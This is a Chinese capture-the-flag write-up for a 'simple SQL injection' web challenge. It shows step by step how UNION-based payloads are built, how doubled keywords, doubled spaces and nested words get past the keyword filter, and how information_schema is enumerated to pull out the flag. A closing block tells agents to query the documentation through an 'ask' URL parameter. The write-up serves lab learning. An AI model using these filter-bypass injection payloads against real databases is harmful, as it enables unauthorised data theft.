# 简单的sql注入

## 题目

通过注入获得flag值（提交格式：flag{}）。

解题链接： <http://ctf5.shiyanbar.com/423/web/>

## writeup

参考：<http://hebin.me/2017/09/06/%E8%A5%BF%E6%99%AEctf-%E7%AE%80%E5%8D%95%E7%9A%84sql%E6%B3%A8%E5%85%A5/>

### 步骤

首先，爆出表名：

```
1'  unionunion  selectselect  table_name  fromfrom  information_schema.tables  wherewhere  '1'='1
```

再爆出列名：

```
1' unionunion  selectselect  column_namcolumn_namee  fromfrom  information_schema.coluinformation_schema.columnsmns  wherewhere  table_name='flag
```

再直接看值：

```
1'  unionunion  selectselect  flag  fromfrom  flag  wherewhere  '1'='1
```

### 探究

1. 输入数值1返回结果：

```
ID: 1
name: baloteli
```

在输入1'(注意输入法)：

```
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''1''' at line 1
```

可见输入的是字符串类型，并且存在注入点。

1. 由于题目问过滤了什么，干脆将几个关键字一起写出来，输入如下语句：

```
1 and or # --  union select from where
```

```
ID: 1 or    where
name: baloteli
```

从id项看出有几个已经被过滤掉了，而且是直接把关键字给去掉，那么可以用类似ab(abc)c来绕过过滤，abc是要绕过的关键字，使用时不加括号，这里加括号只是为了区分.

1. 开始爆表名，在之前应该先猜解union需要的列数，我直接猜的1列：

```
1' ununionion seselectlect 1 frofromm information_schema.tables where '1'='1
```

```
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'ununionion seselectlect 1 frofromm information_schema.tables '1'='1'' at line 1
```

尴尬了。。几个关键字竟然没有成功绕过，猜想过滤时应该是从单词开始进行匹配的，那么可以尝试将两个同样的关键字首尾连起来测试，并且从返回结果还可以看到where关键字被过滤了（不知道为什么第一步中没被过滤）。

```
1' unionunion selectselect table_name fromfrom information_schema.tables wherewhere '1'='1
```

```
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'unionselecttable_name frominformation_schema.tables where'1'='1'' at line 1
```

又报错了，但是可以发现几个关键字已经绕过过滤了，但是他们却连在了一起，可能空格已被过滤了，再试试

```
1'  unionunion  selectselect  table_name  fromfrom  information_schema.tables  wherewhere  '1'='1
```

就是用两个空格代替一个，方法和关键字一样。然后直接返回一大堆结果，可以发现一个特殊的表名

```
ID: 1'  union select table_name  from information_schema.tables  where '1'='1
name: flag
```

1. 爆出列名：

```
1'  unionunion  selectselect  column_name  fromfrom  information_schema.columns  wherewhere  table_name='flag
```

```
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'from   where table_name='flag'' at line 1
```

`information_schema.columns` 跑哪了？估计被过滤了

```
1'  unionunion  selectselect  column_name  fromfrom  information_schema.columnsinformation_schema.columns  wherewhere  table_name='flag
```

结果仍然是刚才的错误警告，不知道后台怎么过滤的，再换一种ab（abc）c形式的过滤

```
1' unionunion  selectselect  column_name  fromfrom information_schema.coluinformation_schema.columnsmns  wherewhere  table_name='flag
```

```
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'where table_name='flag'' at line 1
```

这下有点懵了，这会是什么错误？想了半天，可能是把column\_name也给过滤了吧：

```
1' unionunion  selectselect  column_namcolumn_namee  fromfrom  information_schema.coluinformation_schema.columnsmns  wherewhere  table_name='flag
```

```
ID: 1' union select column_name  from information_schema.columns  where table_name='flag
name: baloteli

ID: 1' union select column_name  from information_schema.columns  where table_name='flag
name: flag

ID: 1' union select column_name  from information_schema.columns  where table_name='flag
name: id
```

找到特殊列flag

1. 直接查询flag：

```
1'  unionunion  selectselect  flag  fromfrom  flag  wherewhere  '1'='1
```

```
ID: 1'  union select flag  from flag  where '1'='1
name: baloteli

ID: 1'  union select flag  from flag  where '1'='1
name: flag{******}
```


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://l1nwatch.gitbook.io/ctf/shi-yan-ba/web/jian-dan-de-sql-zhu-ru.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.